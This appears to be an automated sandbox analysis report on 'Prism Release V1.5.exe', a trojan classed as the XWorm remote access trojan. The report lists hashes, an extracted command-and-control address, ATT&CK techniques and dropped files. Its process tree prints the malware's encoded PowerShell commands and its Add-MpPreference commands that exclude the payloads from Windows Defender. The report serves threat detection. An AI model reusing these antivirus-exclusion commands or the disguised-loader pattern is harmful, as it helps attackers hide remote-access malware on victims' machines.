xworm | 1f4fbb86e1e513b8bed2fa7a011d094e9f4dbb213e7ae8c34693c6f5343442c3

Resubmissions

15/06/2024, 13:17

240615-qjcprswbjp 10

15/06/2024, 13:11

240615-qe95gavhrr 10

15/06/2024, 13:08

240615-qdjwws1hjh 10

Analysis

max time kernel
11s
max time network
11s
platform
windows7_x64
resource
win7-20240611-en
resource tags

arch:x64arch:x86image:win7-20240611-enlocale:en-usos:windows7-x64system
submitted
15/06/2024, 13:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Prism Release/Prism Release V1.5.exe
Size

5.1MB
MD5

ac80f970a7ae1c07663abdd11d752d34
SHA1

5ee4c0de86dc91aebb47f3ea6b7e624e861fdfad
SHA256

b61ca7c42fef43547c7892c76a925ec4a846373bfcde20426c913a4390f71001
SHA512

7bd6150976477bec27532e7d7449e8a1ee6997b41359f3b31e2da8db0602f1ac0dfae171d8ebe00a0e18c2c77c7f9e4ed18352f7d8cf76c1cff855166ed6f94b
SSDEEP

98304:crjAG8empOd+SyaREAaOeaD5lWsjvi+ffzwZZHUzItLqbn82rh:3ppcNJQkjvi+ffzwZZJiR1

Score

10^/10

xworm execution rat trojan

Malware Config

Extracted

Family

xworm

91.92.241.69:5555

Attributes

Install_directory
%ProgramData%
install_file
Windows Runtime.exe

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral3/files/0x000d000000012261-5.dat	family_xworm
behavioral3/memory/2696-84-0x00000000003D0000-0x00000000003EA000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2648	powershell.exe
1844	powershell.exe
1524	powershell.exe
2380	powershell.exe
2012	powershell.exe
1332	powershell.exe

Executes dropped EXE 3 IoCs

pid	Process
2696	dllhost.exe
2684	Prism Executor.exe
2960	nexusloader.exe

Loads dropped DLL 4 IoCs

pid	Process
2204	Prism Release V1.5.exe
2204	Prism Release V1.5.exe
2684	Prism Executor.exe
2960	nexusloader.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
2	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
1844	powershell.exe
2648	powershell.exe
1524	powershell.exe
2380	powershell.exe
2012	powershell.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	1844	powershell.exe
Token: SeDebugPrivilege	2648	powershell.exe
Token: SeDebugPrivilege	2696	dllhost.exe
Token: SeDebugPrivilege	1524	powershell.exe
Token: SeDebugPrivilege	2380	powershell.exe
Token: SeDebugPrivilege	2012	powershell.exe

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 2204 wrote to memory of 2648	2204	Prism Release V1.5.exe	28
PID 2204 wrote to memory of 2648	2204	Prism Release V1.5.exe	28
PID 2204 wrote to memory of 2648	2204	Prism Release V1.5.exe	28
PID 2204 wrote to memory of 2648	2204	Prism Release V1.5.exe	28
PID 2204 wrote to memory of 1844	2204	Prism Release V1.5.exe	30
PID 2204 wrote to memory of 1844	2204	Prism Release V1.5.exe	30
PID 2204 wrote to memory of 1844	2204	Prism Release V1.5.exe	30
PID 2204 wrote to memory of 1844	2204	Prism Release V1.5.exe	30
PID 2204 wrote to memory of 2696	2204	Prism Release V1.5.exe	32
PID 2204 wrote to memory of 2696	2204	Prism Release V1.5.exe	32
PID 2204 wrote to memory of 2696	2204	Prism Release V1.5.exe	32
PID 2204 wrote to memory of 2696	2204	Prism Release V1.5.exe	32
PID 2204 wrote to memory of 2684	2204	Prism Release V1.5.exe	33
PID 2204 wrote to memory of 2684	2204	Prism Release V1.5.exe	33
PID 2204 wrote to memory of 2684	2204	Prism Release V1.5.exe	33
PID 2204 wrote to memory of 2684	2204	Prism Release V1.5.exe	33
PID 2684 wrote to memory of 2960	2684	Prism Executor.exe	34
PID 2684 wrote to memory of 2960	2684	Prism Executor.exe	34
PID 2684 wrote to memory of 2960	2684	Prism Executor.exe	34
PID 2696 wrote to memory of 1524	2696	dllhost.exe	36
PID 2696 wrote to memory of 1524	2696	dllhost.exe	36
PID 2696 wrote to memory of 1524	2696	dllhost.exe	36
PID 2696 wrote to memory of 2380	2696	dllhost.exe	38
PID 2696 wrote to memory of 2380	2696	dllhost.exe	38
PID 2696 wrote to memory of 2380	2696	dllhost.exe	38
PID 2696 wrote to memory of 2012	2696	dllhost.exe	40
PID 2696 wrote to memory of 2012	2696	dllhost.exe	40
PID 2696 wrote to memory of 2012	2696	dllhost.exe	40

C:\Users\Admin\AppData\Local\Temp\Prism Release\Prism Release V1.5.exe
"C:\Users\Admin\AppData\Local\Temp\Prism Release\Prism Release V1.5.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2204
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAdABtACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHEAegBnACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcALgBnAGcALwBnAGUAdABwAHIAaQBzAG0AIAAtACAAUgB1AG4AIABBAHMAIABBAGQAbQBpAG4AIABJAGYAIABJAG4AagBlAGMAdABpAG8AbgAgAEYAYQBpAGwAcwAnACwAJwAnACwAJwBPAEsAJwAsACcASQBuAGYAbwByAG0AYQB0AGkAbwBuACcAKQA8ACMAdQBzAGQAIwA+AA=="
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2648
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAdAB2ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAcQB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdQBwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAdwBhACMAPgA="
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1844
- C:\Users\Admin\dllhost.exe
  "C:\Users\Admin\dllhost.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2696
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\dllhost.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1524
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'dllhost.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2380
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Windows Runtime.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2012
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Runtime.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:1332
- C:\Users\Admin\Prism Executor.exe
  "C:\Users\Admin\Prism Executor.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2684
- - C:\Users\Admin\AppData\Local\Temp\onefile_2684_133629307338792000\nexusloader.exe
    "C:\Users\Admin\Prism Executor.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2960

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\onefile_2684_133629307338792000\nexusloader.exe

Filesize
3.5MB

MD5
58545dc488990ac11872079d119f8284

SHA1
dade5c16834d582a5187041697cc5a7c2eae2f88

SHA256
6669bd79928492ab626c6cc64de35e3da76d655bbd197b5cc644584014fea5bc

SHA512
93d6e3f6a2ff03b4b58db7c04f8ad00e5c5f95eceefd199b73a8af6009ef381f758825ebe3d0d3076f917299c850b2859fb2ec35eeef59126617d2a0ec54dcd7

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_2684_133629307338792000\python310.dll

Filesize
4.2MB

MD5
384349987b60775d6fc3a6d202c3e1bd

SHA1
701cb80c55f859ad4a31c53aa744a00d61e467e5

SHA256
f281c2e252ed59dd96726dbb2de529a2b07b818e9cc3799d1ffa9883e3028ed8

SHA512
6bf3ef9f08f4fc07461b6ea8d9822568ad0a0f211e471b990f62c6713adb7b6be28b90f206a4ec0673b92bae99597d1c7785381e486f6091265c7df85ff0f9b5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
29848d4b221c3b907ab6308ad5cc6560

SHA1
8a30edbdfcd477b8a9cdfd6536a5d7d2c37ed7a8

SHA256
36bf80a388d7ec142e25e7dd9e8e8296582f0382ca1c544d7069294afc2c34a1

SHA512
bb46f08429bdd22aa9f370dbf8880e1207bdfa3d4a7c1a875f2d9cea67bc933b83fc3821e2e4f7e366f25899e5988095e414816bc20fbb5de716bcc8861ee9fd

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JGO7NOTH8QWRO33FYPYE.temp

Filesize
7KB

MD5
fdf48d897f06a44cb15002d27e1820f1

SHA1
1d8b76952fbe3070d9255554dab797e36631ad85

SHA256
3a3c7800f36c4a77456ec16cc7d4e6d51fef78ec0d5061b624a29779d98ab433

SHA512
f8e5260cf81791ff42dd1a899f0d5c553273ae0568ec96b174ebaf56e7b02ae7b54cc904f7d64a05a544f4d28edb14dd17472e9bc011f988f0794b130f346b32

Download Submit
C:\Users\Admin\dllhost.exe

Filesize
78KB

MD5
4a7f75343aaa5a4d8d18add50ccf3139

SHA1
110c62eee6d7deb4aa9d601c942eae43482d2125

SHA256
34be6a934fd45752e788f9ba20943c8e52d91732d76e9f30a5176e98dccd956e

SHA512
1f1516fc41e0b90d0d47e306da15a542799425159f4ad476cf4fd88b9b56d200c79c72ce29ca5b0acf2a195cabe803c37c72b8d76e99a69a04dbfe1fb9f9fc79

Download Submit
\Users\Admin\Prism Executor.exe

Filesize
5.0MB

MD5
fa819e23d8fee4ea89aaaea55e0b28f5

SHA1
18335d4e0d140dcab66c7197c57f669251898ce5

SHA256
bb4fbbf322982321c56ac48cb7939ef7cb823b510a184c41e284f2cdf1bab68c

SHA512
e6170df5c8705e96a76cb3b366c9410c8f8e5c5dd5753de9be87e47a1c989b4723dd655e3355d52096f7acd3185a5469ed5bf284e7765e9519522ae132cef07d

Download Submit
memory/1524-955-0x000000001B3F0000-0x000000001B6D2000-memory.dmp

Filesize
2.9MB

Download
memory/1524-956-0x00000000023F0000-0x00000000023F8000-memory.dmp

Filesize
32KB

Download
memory/2696-84-0x00000000003D0000-0x00000000003EA000-memory.dmp

Filesize
104KB

Download